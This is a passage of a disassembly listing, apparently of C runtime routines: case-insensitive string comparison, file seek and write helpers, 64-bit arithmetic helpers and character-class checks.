arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_4F33F0
cmp dword ptr [eax+8], 0
jnz short loc_420F63
mov al, 0FFh
mov edi, edi
loc_420F2C: ; CODE XREF: sub_420F10+28�j
; sub_420F10+48�j
or al, al
jz short loc_420F5E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_420F2C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_420F2C
sbb al, al
sbb al, 0FFh
loc_420F5E: ; CODE XREF: sub_420F10+1E�j
movsx eax, al
jmp short loc_420FDB
; ---------------------------------------------------------------------------
loc_420F63: ; CODE XREF: sub_420F10+16�j
lock inc ds:dword_4F37C8
cmp ds:dword_4F37C4, 0
jg short loc_420F77
push 0
jmp short loc_420F8C
; ---------------------------------------------------------------------------
loc_420F77: ; CODE XREF: sub_420F10+61�j
lock dec ds:dword_4F37C8
push 13h
call sub_423280
mov [esp+10h+var_10], 1
loc_420F8C: ; CODE XREF: sub_420F10+65�j
mov eax, 0FFh
xor ebx, ebx
nop
loc_420F94: ; CODE XREF: sub_420F10+90�j
; sub_420F10+A8�j
or al, al
jz short loc_420FBF
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_420F94
push eax
push ebx
call sub_421D30
mov ebx, eax
add esp, 4
call sub_421D30
add esp, 4
cmp bl, al
jz short loc_420F94
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_420FBF: ; CODE XREF: sub_420F10+86�j
mov ebx, eax
pop eax
or eax, eax
jnz short loc_420FCF
lock dec ds:dword_4F37C8
jmp short loc_420FD9
; ---------------------------------------------------------------------------
loc_420FCF: ; CODE XREF: sub_420F10+B4�j
push 13h
call sub_423320
add esp, 4
loc_420FD9: ; CODE XREF: sub_420F10+BD�j
mov eax, ebx
loc_420FDB: ; CODE XREF: sub_420F10+51�j
pop ebx
pop esi
pop edi
leave
retn
sub_420F10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FE0 proc near ; CODE XREF: sub_41206F+26E�p
; sub_41206F+377�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_420FE7: ; CODE XREF: sub_420FE0+2F�j
cmp [ebp+arg_0], 0
jnz short loc_42100B
push offset dword_43C504
push 0
push 65h
push offset dword_43CDB8
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42100B
int 3 ; Trap to Debugger
loc_42100B: ; CODE XREF: sub_420FE0+B�j
; sub_420FE0+28�j
xor eax, eax
test eax, eax
jnz short loc_420FE7
mov ecx, [ebp+arg_0]
push ecx
call sub_422420
add esp, 4
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421050
add esp, 0Ch
mov [ebp+var_4], eax
mov edx, [ebp+arg_0]
push edx
call sub_422490
add esp, 4
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421050 proc near ; CODE XREF: sub_420FE0+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_421057: ; CODE XREF: sub_421050+32�j
cmp [ebp+arg_0], 0
jnz short loc_42107E
push offset dword_43C514
push 0
push 92h
push offset dword_43CDB8
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42107E
int 3 ; Trap to Debugger
loc_42107E: ; CODE XREF: sub_421050+B�j
; sub_421050+2B�j
xor eax, eax
test eax, eax
jnz short loc_421057
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_4210AB
cmp [ebp+arg_8], 0
jz short loc_4210BE
cmp [ebp+arg_8], 1
jz short loc_4210BE
cmp [ebp+arg_8], 2
jz short loc_4210BE
loc_4210AB: ; CODE XREF: sub_421050+47�j
call sub_429A90
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp loc_421170
; ---------------------------------------------------------------------------
loc_4210BE: ; CODE XREF: sub_421050+4D�j
; sub_421050+53�j ...
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFEFh
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
cmp [ebp+arg_8], 1
jnz short loc_4210EE
mov ecx, [ebp+var_4]
push ecx
call sub_42E6A0
add esp, 4
mov edx, [ebp+arg_4]
add edx, eax
mov [ebp+arg_4], edx
mov [ebp+arg_8], 0
loc_4210EE: ; CODE XREF: sub_421050+81�j
mov eax, [ebp+var_4]
push eax
call sub_422F20
add esp, 4
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_42111B
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 0FFFFFFFCh
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
jmp short loc_42114F
; ---------------------------------------------------------------------------
loc_42111B: ; CODE XREF: sub_421050+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 1
test ecx, ecx
jz short loc_42114F
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 8
test eax, eax
jz short loc_42114F
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 400h
test edx, edx
jnz short loc_42114F
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 200h
loc_42114F: ; CODE XREF: sub_421050+C9�j
; sub_421050+D6�j ...
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
call sub_42E4E0
add esp, 0Ch
sub eax, 0FFFFFFFFh
neg eax
sbb eax, eax
neg eax
dec eax
loc_421170: ; CODE XREF: sub_421050+69�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421050 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_421180 proc near ; CODE XREF: sub_4133AE+19E�p
; sub_414103+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_421199
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_421199: ; CODE XREF: sub_421180+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_421180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4211C0 proc near ; CODE XREF: sub_416B2D+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_C]
push eax
call sub_422420
add esp, 4
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421200
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+arg_C]
push edx
call sub_422490
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4211C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421200 proc near ; CODE XREF: sub_4211C0+20�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jnz short loc_421229
xor eax, eax
jmp loc_421415
; ---------------------------------------------------------------------------
loc_421229: ; CODE XREF: sub_421200+20�j
mov eax, [ebp+arg_C]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jz short loc_421244
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
jmp short loc_42124B
; ---------------------------------------------------------------------------
loc_421244: ; CODE XREF: sub_421200+37�j
mov [ebp+var_1C], 1000h
loc_42124B: ; CODE XREF: sub_421200+42�j
; sub_421200:loc_42140D�j
cmp [ebp+var_C], 0
jz loc_421412
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
and edx, 108h
test edx, edx
jz short loc_4212D9
mov eax, [ebp+arg_C]
cmp dword ptr [eax+4], 0
jz short loc_4212D9
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
cmp edx, [ecx+4]
jnb short loc_421281
mov eax, [ebp+var_C]
mov [ebp+var_20], eax
jmp short loc_42128A
; ---------------------------------------------------------------------------
loc_421281: ; CODE XREF: sub_421200+77�j
mov ecx, [ebp+arg_C]
mov edx, [ecx+4]
mov [ebp+var_20], edx
loc_42128A: ; CODE XREF: sub_421200+7F�j
mov eax, [ebp+var_20]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
push ecx
call sub_41FBF0
add esp, 0Ch
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov [ebp+var_C], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
sub ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
add ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_18]
mov [ebp+var_8], eax
jmp loc_42140D
; ---------------------------------------------------------------------------
loc_4212D9: ; CODE XREF: sub_421200+63�j
; sub_421200+6C�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_1C]
jb loc_4213AF
mov edx, [ebp+arg_C]
mov eax, [edx+0Ch]
and eax, 108h
test eax, eax
jz short loc_421314
mov ecx, [ebp+arg_C]
push ecx
call sub_422F20
add esp, 4
test eax, eax
jz short loc_421314
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_421415
; ---------------------------------------------------------------------------
loc_421314: ; CODE XREF: sub_421200+F2�j
; sub_421200+102�j
cmp [ebp+var_1C], 0
jz short loc_42132C
mov eax, [ebp+var_C]
xor edx, edx
div [ebp+var_1C]
mov eax, [ebp+var_C]
sub eax, edx
mov [ebp+var_24], eax
jmp short loc_421332
; ---------------------------------------------------------------------------
loc_42132C: ; CODE XREF: sub_421200+118�j
mov ecx, [ebp+var_C]
mov [ebp+var_24], ecx
loc_421332: ; CODE XREF: sub_421200+12A�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx+10h]
push eax
call sub_42E940
add esp, 0Ch
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_421377
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_421415
; ---------------------------------------------------------------------------
loc_421377: ; CODE XREF: sub_421200+156�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_14]
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_14]
mov [ebp+var_8], edx
mov eax, [ebp+var_14]
cmp eax, [ebp+var_18]
jnb short loc_4213AD
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_421415
; ---------------------------------------------------------------------------
loc_4213AD: ; CODE XREF: sub_421200+18F�j
jmp short loc_42140D
; ---------------------------------------------------------------------------
loc_4213AF: ; CODE XREF: sub_421200+DF�j
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_427CE0
add esp, 8
cmp eax, 0FFFFFFFFh
jnz short loc_4213DA
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_421415
; ---------------------------------------------------------------------------
loc_4213DA: ; CODE XREF: sub_421200+1CB�j
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
sub eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+18h], 0
jle short loc_421400
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_28], eax
jmp short loc_421407
; ---------------------------------------------------------------------------
loc_421400: ; CODE XREF: sub_421200+1F3�j
mov [ebp+var_28], 1
loc_421407: ; CODE XREF: sub_421200+1FE�j
mov ecx, [ebp+var_28]
mov [ebp+var_1C], ecx
loc_42140D: ; CODE XREF: sub_421200+D4�j
; sub_421200:loc_4213AD�j
jmp loc_42124B
; ---------------------------------------------------------------------------
loc_421412: ; CODE XREF: sub_421200+4F�j
mov eax, [ebp+arg_8]
loc_421415: ; CODE XREF: sub_421200+24�j
; sub_421200+10F�j ...
mov esp, ebp
pop ebp
retn
sub_421200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421420 proc near ; CODE XREF: sub_417264+8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:off_4F536C
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_42144B
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_42147C
; ---------------------------------------------------------------------------
loc_42144B: ; CODE XREF: sub_421420+15�j
mov ecx, [ebp+var_4]
and ecx, 1
test ecx, ecx
jz short loc_42147A
mov edx, [ebp+arg_4]
and edx, 2
test edx, edx
jz short loc_42147A
call sub_429A90
mov dword ptr [eax], 0Dh
call sub_429AA0
mov dword ptr [eax], 5
or eax, 0FFFFFFFFh
jmp short loc_42147C
; ---------------------------------------------------------------------------
loc_42147A: ; CODE XREF: sub_421420+33�j
; sub_421420+3D�j
xor eax, eax
loc_42147C: ; CODE XREF: sub_421420+29�j
; sub_421420+58�j
mov esp, ebp
pop ebp
retn
sub_421420 endp
; =============== S U B R O U T I N E =======================================
sub_421480 proc near ; CODE XREF: sub_41727E+3F�p
; sub_41B605+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_4214A2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4214E3
; ---------------------------------------------------------------------------
loc_4214A2: ; CODE XREF: sub_421480+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4214B0: ; CODE XREF: sub_421480+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4214B0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4214DE
cmp edx, [esp+8+arg_4]
ja short loc_4214DE
jb short loc_4214DF
cmp eax, [esp+8+arg_0]
jbe short loc_4214DF
loc_4214DE: ; CODE XREF: sub_421480+4E�j
; sub_421480+54�j
dec esi
loc_4214DF: ; CODE XREF: sub_421480+56�j
; sub_421480+5C�j
xor edx, edx
mov eax, esi
loc_4214E3: ; CODE XREF: sub_421480+20�j
pop esi
pop ebx
retn 10h
sub_421480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4214F0 proc near ; CODE XREF: sub_41727E+2D�p
; sub_41B605+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_421511
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_421561
; ---------------------------------------------------------------------------
loc_421511: ; CODE XREF: sub_4214F0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_42151F: ; CODE XREF: sub_4214F0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_42151F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_42154A
cmp edx, [esp+4+arg_4]
ja short loc_42154A
jb short loc_421552
cmp eax, [esp+4+arg_0]
jbe short loc_421552
loc_42154A: ; CODE XREF: sub_4214F0+4A�j
; sub_4214F0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_421552: ; CODE XREF: sub_4214F0+52�j
; sub_4214F0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_421561: ; CODE XREF: sub_4214F0+1F�j
pop ebx
retn 10h
sub_4214F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_421570 proc near ; CODE XREF: sub_41738D+5E�p
; sub_41738D+8E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_421591
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_421591: ; CODE XREF: sub_421570+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_4215AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_4215AD: ; CODE XREF: sub_421570+27�j
or eax, eax
jnz short loc_4215C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_42160A
; ---------------------------------------------------------------------------
loc_4215C9: ; CODE XREF: sub_421570+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4215D7: ; CODE XREF: sub_421570+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4215D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_421605
cmp edx, [esp+0Ch+arg_4]
ja short loc_421605
jb short loc_421606
cmp eax, [esp+0Ch+arg_0]
jbe short loc_421606
loc_421605: ; CODE XREF: sub_421570+85�j
; sub_421570+8B�j
dec esi
loc_421606: ; CODE XREF: sub_421570+8D�j
; sub_421570+93�j
xor edx, edx
mov eax, esi
loc_42160A: ; CODE XREF: sub_421570+57�j
dec edi
jnz short loc_421614
neg edx
neg eax
sbb edx, 0
loc_421614: ; CODE XREF: sub_421570+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_421570 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421620 proc near ; CODE XREF: sub_417A3E+BF�p
; sub_417A3E+12C�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_8], 0
cmp ds:dword_4F33F8, 0
jnz short loc_42167D
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
jmp short loc_421647
; ---------------------------------------------------------------------------
loc_42163E: ; CODE XREF: sub_421620:loc_421673�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_421647: ; CODE XREF: sub_421620+1C�j
mov edx, [ebp+var_10]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_421675
mov ecx, [ebp+var_10]
movsx edx, byte ptr [ecx]
cmp edx, 61h
jl short loc_421673
mov eax, [ebp+var_10]
movsx ecx, byte ptr [eax]
cmp ecx, 7Ah
jg short loc_421673
mov edx, [ebp+var_10]
mov al, [edx]
add al, 0E0h
mov ecx, [ebp+var_10]
mov [ecx], al
loc_421673: ; CODE XREF: sub_421620+3A�j
; sub_421620+45�j
jmp short loc_42163E
; ---------------------------------------------------------------------------
loc_421675: ; CODE XREF: sub_421620+2F�j
mov eax, [ebp+arg_0]
jmp loc_4217DB
; ---------------------------------------------------------------------------
loc_42167D: ; CODE XREF: sub_421620+14�j
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_4216AF
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_C], 1
jmp short loc_4216B6
; ---------------------------------------------------------------------------
loc_4216AF: ; CODE XREF: sub_421620+6F�j
mov [ebp+var_C], 0
loc_4216B6: ; CODE XREF: sub_421620+8D�j
cmp ds:dword_4F33F8, 0
jnz short loc_421724
cmp [ebp+var_C], 0
jz short loc_4216D1
push 13h
call sub_423320
add esp, 4
jmp short loc_4216DC
; ---------------------------------------------------------------------------
loc_4216D1: ; CODE XREF: sub_421620+A3�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_4216DC: ; CODE XREF: sub_421620+AF�j
mov edx, [ebp+arg_0]
mov [ebp+var_14], edx
jmp short loc_4216ED
; ---------------------------------------------------------------------------
loc_4216E4: ; CODE XREF: sub_421620:loc_42171A�j
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_14], eax
loc_4216ED: ; CODE XREF: sub_421620+C2�j
mov ecx, [ebp+var_14]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42171C
mov eax, [ebp+var_14]
movsx ecx, byte ptr [eax]
cmp ecx, 61h
jl short loc_42171A
mov edx, [ebp+var_14]
movsx eax, byte ptr [edx]
cmp eax, 7Ah
jg short loc_42171A
mov ecx, [ebp+var_14]
mov dl, [ecx]
add dl, 0E0h
mov eax, [ebp+var_14]
mov [eax], dl
loc_42171A: ; CODE XREF: sub_421620+E0�j
; sub_421620+EB�j
jmp short loc_4216E4
; ---------------------------------------------------------------------------
loc_42171C: ; CODE XREF: sub_421620+D5�j
mov eax, [ebp+arg_0]
jmp loc_4217DB
; ---------------------------------------------------------------------------
loc_421724: ; CODE XREF: sub_421620+9D�j
push 1
push 0
push 0
push 0
push 0FFFFFFFFh
mov ecx, [ebp+arg_0]
push ecx
push 200h
mov edx, ds:dword_4F33F8
push edx
call sub_42EC50
add esp, 20h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_421751
jmp short loc_4217AD
; ---------------------------------------------------------------------------
loc_421751: ; CODE XREF: sub_421620+12D�j
push 62h
push offset dword_43CDC0
push 2
mov eax, [ebp+var_4]
push eax
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_421771
jmp short loc_4217AD
; ---------------------------------------------------------------------------
loc_421771: ; CODE XREF: sub_421620+14D�j
push 1
push 0
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
push edx
push 0FFFFFFFFh
mov eax, [ebp+arg_0]
push eax
push 200h
mov ecx, ds:dword_4F33F8
push ecx
call sub_42EC50
add esp, 20h
test eax, eax
jnz short loc_42179D
jmp short loc_4217AD
; ---------------------------------------------------------------------------
loc_42179D: ; CODE XREF: sub_421620+179�j
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41F620
add esp, 8
loc_4217AD: ; CODE XREF: sub_421620+12F�j
; sub_421620+14F�j ...
cmp [ebp+var_C], 0
jz short loc_4217BF
push 13h
call sub_423320
add esp, 4
jmp short loc_4217CA
; ---------------------------------------------------------------------------
loc_4217BF: ; CODE XREF: sub_421620+191�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_4217CA: ; CODE XREF: sub_421620+19D�j
push 2
mov ecx, [ebp+var_8]
push ecx
call sub_41CA10
add esp, 8
mov eax, [ebp+arg_0]
loc_4217DB: ; CODE XREF: sub_421620+58�j
; sub_421620+FF�j
mov esp, ebp
pop ebp
retn
sub_421620 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421803
push 103h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_42181A
; ---------------------------------------------------------------------------
loc_421803: ; CODE XREF: _0:004217EB�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 103h
mov [ebp-4], eax
loc_42181A: ; CODE XREF: _0:00421801�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421850
push 1
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_421865
; ---------------------------------------------------------------------------
loc_421850: ; CODE XREF: _0:0042183B�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 1
mov [ebp-4], eax
loc_421865: ; CODE XREF: _0:0042184E�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421890
push 2
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_4218A5
; ---------------------------------------------------------------------------
loc_421890: ; CODE XREF: _0:0042187B�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 2
mov [ebp-4], eax
loc_4218A5: ; CODE XREF: _0:0042188E�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4218B0 proc near ; CODE XREF: sub_418428+1A3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_4218D0
push 4
mov eax, [ebp+arg_0]
push eax
call sub_427040
add esp, 8
mov [ebp+var_4], eax
jmp short loc_4218E5
; ---------------------------------------------------------------------------
loc_4218D0: ; CODE XREF: sub_4218B0+B�j
mov ecx, [ebp+arg_0]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_4], eax
loc_4218E5: ; CODE XREF: sub_4218B0+1E�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4218B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_453DF0, 1
jle short loc_421913
push 80h
mov eax, [ebp+8]
push eax
call sub_427040
add esp, 8
mov [ebp-4], eax
jmp short loc_42192A
; ---------------------------------------------------------------------------
loc_421913: ; CODE XREF: _0:004218FB�j
mov ecx, [ebp+8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 80h
mov [ebp-4], eax
loc_42192A: ; CODE XREF: _0:00421911�j
mov eax, [ebp-4]
